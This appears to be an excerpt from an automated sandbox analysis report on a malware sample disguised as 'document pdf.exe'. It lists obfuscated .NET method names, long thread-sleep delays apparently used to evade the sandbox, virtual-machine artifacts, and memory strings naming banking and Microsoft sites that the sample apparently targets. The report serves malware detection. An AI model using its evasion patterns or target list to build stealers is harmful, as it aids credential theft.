                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, cPI0l3jfbUJ3Gmg0V1.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NyhTJ1lLKy', 'x5AT5B97IC', 'keCTzfsSN5', 'WXymAWDY9N', 'PkbmIvFZKy', 'OY6mTlBx3f', 'Bw4mmCGV5P', 'cYbJv2Wq2XnbFuAeAsP'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, h8FvZ2KZgXqfHSw6TQ.cs High entropy of concatenated method names: 'FsIxR710qp', 'pn3x87HW9h', 'ggxxB2OCGT', 'zZFxkCI25u', 'lVXxSXvMHC', 'Ga1xXinRau', 'Ga3x6Rttm6', 'zDVx0PfjJx', 'NEpxnyaPwt', 'tmYxh4ukcr'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.cs High entropy of concatenated method names: 'Ye8mdmUCgJ', 'LCcmZgwSZt', 'FtomClalTp', 'NTPmjqutTf', 'fsFmwRusX1', 'ew7m3AoDvM', 'eRCmx8rCy0', 'NFlmbqIPoA', 'QFZmOybNJk', 'f2amEjmy6S'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, SmJWIrImgluWmDxsAwH.cs High entropy of concatenated method names: 'Wgdy5EpMP8', 'vjiyzy9ghm', 'ntofAX5dLC', 'hg625ADxsd6ES89QyE9', 'JLW1lRDsWv5pYcg7xJa', 'yZqHBiDywWMYBAxnfwa', 'OZb35JDRrWj5l0FCx9l', 'dwJBQ0DzFZPYJtTpAKG', 'WH5qs6q4CchxpWfXV5E'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, JZkhCDMk0cLgxHfPvG.cs High entropy of concatenated method names: 'HFI3dMPkMj', 'wcN3CHKAUX', 'wbI3w4E7nb', 'yfv3xYQ0lW', 'f6t3b0OCG1', 'At9wVx4Ohq', 'JhKwsG4rqs', 'wslwgC3443', 'fImwUHAhrA', 'kAKwJGLxCF'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, FVXmryzaW31h7Zxmic.cs High entropy of concatenated method names: 'UUBvXDAsOi', 'Wlov0JUa1d', 'v9LvntI2vk', 'icrvMQmVn5', 'd8dvoEfBLH', 'V2dvGLc2kK', 'JHvvLOMdrD', 'EsAvF7LspW', 'HwSvR3cDhh', 'QfCv8R7yvA'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, HIouCXJGgpPoraXn6K.cs High entropy of concatenated method names: 'fBEcMAis3A', 'ntucohHH0k', 'RJocHbFF99', 'lOtcGBZ3Re', 'WWTcLYQQ2y', 'fJIc7qhwu8', 'f3ZcYG0Yny', 'XyIcierKU0', 'dgacK3EfSA', 'p7cc2UEouU'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, rjHBq35tdb8ThqfAYv.cs High entropy of concatenated method names: 'soOvjlVFmt', 'sCwvwun86R', 'C8ov30N8KA', 'muRvxnIluq', 'nfFvc32TAv', 'DeCvbdg6t6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, ghvqCQsFvGSW9e4XwQ.cs High entropy of concatenated method names: 'EP6WU4hn8w', 'sFgW5Db4B6', 'W7h4AQTERV', 'Cq24IMokbo', 'aDoWpgrd9Z', 'escWrFY2jQ', 'b0YWDtVojj', 'ufEWeBpZFj', 'kcXWaRmeXi', 'AkWWuqvAxJ'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, GrwPd6g9v5kPAC62D2.cs High entropy of concatenated method names: 'VOMcPypK45', 'uXUcWa5mSN', 'unjcc9tDYp', 'uqZcy5UV0N', 'VTEcN1ytKh', 'FrMcFTZrNM', 'Dispose', 'xOu4ZYMyZj', 'ASo4CmS2xh', 'aTo4jQ0xrv'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, RHg6yTItPdmX4HuYj18.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1NfcdGIO4', 'nKYfvia2tY', 'SkdfySIGjy', 'ATuffNmshs', 'qjFfNf7ONJ', 'CkSfQErUWW', 'GipfF6D3eI'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, f3YHFNTeDelpv03gGw.cs High entropy of concatenated method names: 'bpCBD3DT3', 'hWpkwkWEY', 'V8JXN56WX', 'RhM6yn1g2', 'U6Bni2YCm', 'sEKhexoUp', 'D7wSk0nGn9x18Pv5L4', 'L6vETZdm3eXtETCYLl', 'DXO4Dl4jO', 'riRvg4nYG'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, bYN99uYDD7Yh9wdRps.cs High entropy of concatenated method names: 'IvvxZH8Ebk', 'FktxjKqHuC', 'GS9x34kJQk', 'eA235GXOXE', 'UOw3z2YtCO', 'wFyxAU5E9Q', 'TQbxIxkZai', 'bg2xTTTjta', 'dSZxmdMYCg', 'kq3xt2Q5YI'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, uUu7QSCXOUKTPo9h8I.cs High entropy of concatenated method names: 'Dispose', 'YkPIJAC62D', 'e2uToLCPyc', 'sG2X79hhQq', 'NoII544rYJ', 'jRQIzD8BXF', 'ProcessDialogKey', 'I4oTAIouCX', 'JgpTIPoraX', 'E6KTT4jHBq'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, YuRtjF05Y3giqbqHZM.cs High entropy of concatenated method names: 's0LCe2oJg5', 'oKnCaD8KSM', 'srACuukeLe', 'SMZCqJoKWZ', 'bOYCVYhFje', 'LpVCspNtl3', 'dVrCgaUAUY', 'VEUCUqMhrc', 'dcwCJWBcAo', 'sDuC5R5VoT'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, oe7jL6nP10c2udSebu.cs High entropy of concatenated method names: 'ztsjktPiB4', 'agmjX2BlmL', 'eJWj02eWgD', 'dmjjnyw0At', 'AxbjPhmtG9', 'WugjlDovdQ', 'TrujWRSCUq', 'S9bj4ZbwiM', 'D1cjcTAnO7', 'ak1jvy09rh'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, RiGRWjIA3gRawRHkGiw.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KY1vpYAYZV', 'pxYvrP3xU4', 'mWmvDLi5Ku', 'ixHveIaQhy', 'I63vaJc7X0', 'PLsvum0FBB', 'IWJvqw2CuQ'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, NQRJPkIIPvhJfnFMT9t.cs High entropy of concatenated method names: 'f9Bv5tJ0AX', 'EJZvztt4eh', 'QgxyA8ycZP', 'nsryIiCoAO', 'plxyTPuxbb', 'vMSymLa63n', 'UrAytZ2Y0U', 'W26ydXK6nV', 'FqAyZP5jc8', 'r5iyCv5cK4'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, GoBOSfDFFSJvLMavk4.cs High entropy of concatenated method names: 'HVZ10GPix7', 'Wu11nlouWK', 'hGn1M1VskF', 'dAw1oYZ3wK', 'DsN1GwUEiD', 'hMb1LEaHcP', 'R0F1YXMijq', 'iJK1ipxgTi', 'f9C12htffx', 'Gvm1ppdqLO'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, ifHd6Ot6S8hlB3LBGH.cs High entropy of concatenated method names: 'ET5IxuRtjF', 'YY3Ibgiqbq', 'DP1IE0c2ud', 'BebI9u2D0Z', 'OYZIPiNLZk', 'FCDIlk0cLg', 'oSKU9VwwgMtPUTLERH', 'Ksd22qYtPY0xIpPesT', 'AcgIIvSLVj', 'NXlImlRaXd'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, bjc2kxqG0tHti4aXnv.cs High entropy of concatenated method names: 'WpMWEg8hYk', 'DvWW9VSIjm', 'ToString', 'hvJWZ70BeO', 'tMwWCxmr78', 's4CWjKPMIK', 'na9Wwpmqsx', 'zdHW36FjYg', 'HAFWxZQjnK', 'A3iWbHgSFU'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, VTaW7suKhQpQ6osLov.cs High entropy of concatenated method names: 'ToString', 'Ji1lpyc2QJ', 'nFxloJh5Ym', 'FWglHPWI9i', 'EmblGASyMy', 'MF7lL5bJkG', 'hykl76g8we', 'NIYlYWZVmA', 'bIXliLgkBA', 'Fs6lKeIHyw'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, cPI0l3jfbUJ3Gmg0V1.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NyhTJ1lLKy', 'x5AT5B97IC', 'keCTzfsSN5', 'WXymAWDY9N', 'PkbmIvFZKy', 'OY6mTlBx3f', 'Bw4mmCGV5P', 'cYbJv2Wq2XnbFuAeAsP'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, h8FvZ2KZgXqfHSw6TQ.cs High entropy of concatenated method names: 'FsIxR710qp', 'pn3x87HW9h', 'ggxxB2OCGT', 'zZFxkCI25u', 'lVXxSXvMHC', 'Ga1xXinRau', 'Ga3x6Rttm6', 'zDVx0PfjJx', 'NEpxnyaPwt', 'tmYxh4ukcr'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.cs High entropy of concatenated method names: 'Ye8mdmUCgJ', 'LCcmZgwSZt', 'FtomClalTp', 'NTPmjqutTf', 'fsFmwRusX1', 'ew7m3AoDvM', 'eRCmx8rCy0', 'NFlmbqIPoA', 'QFZmOybNJk', 'f2amEjmy6S'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, SmJWIrImgluWmDxsAwH.cs High entropy of concatenated method names: 'Wgdy5EpMP8', 'vjiyzy9ghm', 'ntofAX5dLC', 'hg625ADxsd6ES89QyE9', 'JLW1lRDsWv5pYcg7xJa', 'yZqHBiDywWMYBAxnfwa', 'OZb35JDRrWj5l0FCx9l', 'dwJBQ0DzFZPYJtTpAKG', 'WH5qs6q4CchxpWfXV5E'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, JZkhCDMk0cLgxHfPvG.cs High entropy of concatenated method names: 'HFI3dMPkMj', 'wcN3CHKAUX', 'wbI3w4E7nb', 'yfv3xYQ0lW', 'f6t3b0OCG1', 'At9wVx4Ohq', 'JhKwsG4rqs', 'wslwgC3443', 'fImwUHAhrA', 'kAKwJGLxCF'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, FVXmryzaW31h7Zxmic.cs High entropy of concatenated method names: 'UUBvXDAsOi', 'Wlov0JUa1d', 'v9LvntI2vk', 'icrvMQmVn5', 'd8dvoEfBLH', 'V2dvGLc2kK', 'JHvvLOMdrD', 'EsAvF7LspW', 'HwSvR3cDhh', 'QfCv8R7yvA'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, HIouCXJGgpPoraXn6K.cs High entropy of concatenated method names: 'fBEcMAis3A', 'ntucohHH0k', 'RJocHbFF99', 'lOtcGBZ3Re', 'WWTcLYQQ2y', 'fJIc7qhwu8', 'f3ZcYG0Yny', 'XyIcierKU0', 'dgacK3EfSA', 'p7cc2UEouU'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, rjHBq35tdb8ThqfAYv.cs High entropy of concatenated method names: 'soOvjlVFmt', 'sCwvwun86R', 'C8ov30N8KA', 'muRvxnIluq', 'nfFvc32TAv', 'DeCvbdg6t6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, ghvqCQsFvGSW9e4XwQ.cs High entropy of concatenated method names: 'EP6WU4hn8w', 'sFgW5Db4B6', 'W7h4AQTERV', 'Cq24IMokbo', 'aDoWpgrd9Z', 'escWrFY2jQ', 'b0YWDtVojj', 'ufEWeBpZFj', 'kcXWaRmeXi', 'AkWWuqvAxJ'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, GrwPd6g9v5kPAC62D2.cs High entropy of concatenated method names: 'VOMcPypK45', 'uXUcWa5mSN', 'unjcc9tDYp', 'uqZcy5UV0N', 'VTEcN1ytKh', 'FrMcFTZrNM', 'Dispose', 'xOu4ZYMyZj', 'ASo4CmS2xh', 'aTo4jQ0xrv'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, RHg6yTItPdmX4HuYj18.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1NfcdGIO4', 'nKYfvia2tY', 'SkdfySIGjy', 'ATuffNmshs', 'qjFfNf7ONJ', 'CkSfQErUWW', 'GipfF6D3eI'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, f3YHFNTeDelpv03gGw.cs High entropy of concatenated method names: 'bpCBD3DT3', 'hWpkwkWEY', 'V8JXN56WX', 'RhM6yn1g2', 'U6Bni2YCm', 'sEKhexoUp', 'D7wSk0nGn9x18Pv5L4', 'L6vETZdm3eXtETCYLl', 'DXO4Dl4jO', 'riRvg4nYG'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, bYN99uYDD7Yh9wdRps.cs High entropy of concatenated method names: 'IvvxZH8Ebk', 'FktxjKqHuC', 'GS9x34kJQk', 'eA235GXOXE', 'UOw3z2YtCO', 'wFyxAU5E9Q', 'TQbxIxkZai', 'bg2xTTTjta', 'dSZxmdMYCg', 'kq3xt2Q5YI'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, uUu7QSCXOUKTPo9h8I.cs High entropy of concatenated method names: 'Dispose', 'YkPIJAC62D', 'e2uToLCPyc', 'sG2X79hhQq', 'NoII544rYJ', 'jRQIzD8BXF', 'ProcessDialogKey', 'I4oTAIouCX', 'JgpTIPoraX', 'E6KTT4jHBq'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, YuRtjF05Y3giqbqHZM.cs High entropy of concatenated method names: 's0LCe2oJg5', 'oKnCaD8KSM', 'srACuukeLe', 'SMZCqJoKWZ', 'bOYCVYhFje', 'LpVCspNtl3', 'dVrCgaUAUY', 'VEUCUqMhrc', 'dcwCJWBcAo', 'sDuC5R5VoT'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, oe7jL6nP10c2udSebu.cs High entropy of concatenated method names: 'ztsjktPiB4', 'agmjX2BlmL', 'eJWj02eWgD', 'dmjjnyw0At', 'AxbjPhmtG9', 'WugjlDovdQ', 'TrujWRSCUq', 'S9bj4ZbwiM', 'D1cjcTAnO7', 'ak1jvy09rh'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, RiGRWjIA3gRawRHkGiw.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KY1vpYAYZV', 'pxYvrP3xU4', 'mWmvDLi5Ku', 'ixHveIaQhy', 'I63vaJc7X0', 'PLsvum0FBB', 'IWJvqw2CuQ'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, NQRJPkIIPvhJfnFMT9t.cs High entropy of concatenated method names: 'f9Bv5tJ0AX', 'EJZvztt4eh', 'QgxyA8ycZP', 'nsryIiCoAO', 'plxyTPuxbb', 'vMSymLa63n', 'UrAytZ2Y0U', 'W26ydXK6nV', 'FqAyZP5jc8', 'r5iyCv5cK4'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, GoBOSfDFFSJvLMavk4.cs High entropy of concatenated method names: 'HVZ10GPix7', 'Wu11nlouWK', 'hGn1M1VskF', 'dAw1oYZ3wK', 'DsN1GwUEiD', 'hMb1LEaHcP', 'R0F1YXMijq', 'iJK1ipxgTi', 'f9C12htffx', 'Gvm1ppdqLO'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, ifHd6Ot6S8hlB3LBGH.cs High entropy of concatenated method names: 'ET5IxuRtjF', 'YY3Ibgiqbq', 'DP1IE0c2ud', 'BebI9u2D0Z', 'OYZIPiNLZk', 'FCDIlk0cLg', 'oSKU9VwwgMtPUTLERH', 'Ksd22qYtPY0xIpPesT', 'AcgIIvSLVj', 'NXlImlRaXd'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, bjc2kxqG0tHti4aXnv.cs High entropy of concatenated method names: 'WpMWEg8hYk', 'DvWW9VSIjm', 'ToString', 'hvJWZ70BeO', 'tMwWCxmr78', 's4CWjKPMIK', 'na9Wwpmqsx', 'zdHW36FjYg', 'HAFWxZQjnK', 'A3iWbHgSFU'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, VTaW7suKhQpQ6osLov.cs High entropy of concatenated method names: 'ToString', 'Ji1lpyc2QJ', 'nFxloJh5Ym', 'FWglHPWI9i', 'EmblGASyMy', 'MF7lL5bJkG', 'hykl76g8we', 'NIYlYWZVmA', 'bIXliLgkBA', 'Fs6lKeIHyw'
                Source: C:\Users\user\Desktop\document pdf.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 2FA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 31B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 2FA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 8160000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 9160000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 9310000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: A310000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: F10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 2A70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Memory allocated: 2840000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\document pdf.exe | Thread delayed: delay time: 922337203685477 (TimeSpan.MaxValue expressed in milliseconds, i.e. an effectively unbounded wait)
                Source: C:\Users\user\Desktop\document pdf.exe | Thread delayed: delay time: 600000, 599875, 599766, 599641, 599531, 599422, 599312, 599203, 599094, 598984, 598875, 598766, 598641, 598526, 598406, 598297, 598172, 598063, 597938, 597828, 597719, 597594, 597484, 597375, 597266, 597156, 597047, 596937, 596821, 596703, 596593, 596484, 596375, 596266, 596156, 596047, 595937, 595828, 595719, 595609, 595499, 595391, 595281, 595172, 595063, 594938, 594813, 594688, 594578, 594467 (50 consecutive delays starting at 10 minutes, each roughly 110 to 125 ms shorter than the one before: the pattern of a loop that re-sleeps for the time remaining until a fixed deadline after each sleep returns early)
                Source: C:\Users\user\Desktop\document pdf.exe | Window / User API: threadDelayed 1573
                Source: C:\Users\user\Desktop\document pdf.exe | Window / User API: threadDelayed 8276
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236 | Thread sleep count: 35 > 30
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236 | Thread sleep time: -32281802128991695s >= -30000s
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236 | Thread sleep time: -600000s through -594467s (the same 50 values as the Thread delayed entries above, each reported as >= -30000s)
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4976 | Thread sleep count: 1573 > 30
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4976 | Thread sleep count: 8276 > 30
                Source: Amcache.hve.6.dr | Binary or memory string: VMware (Amcache.hve.6.dr is a dropped copy of the analysis VM's own Amcache hive; the hardware strings from it below describe the sandbox host rather than a check performed by the sample)
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
                Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
                Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
                Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: document pdf.exe, 00000003.00000002.4662850359.0000000000B66000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll (name of the Winsock AF_HYPERV provider registered on standard Windows 10 installs; weak as a virtualization indicator on its own)
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
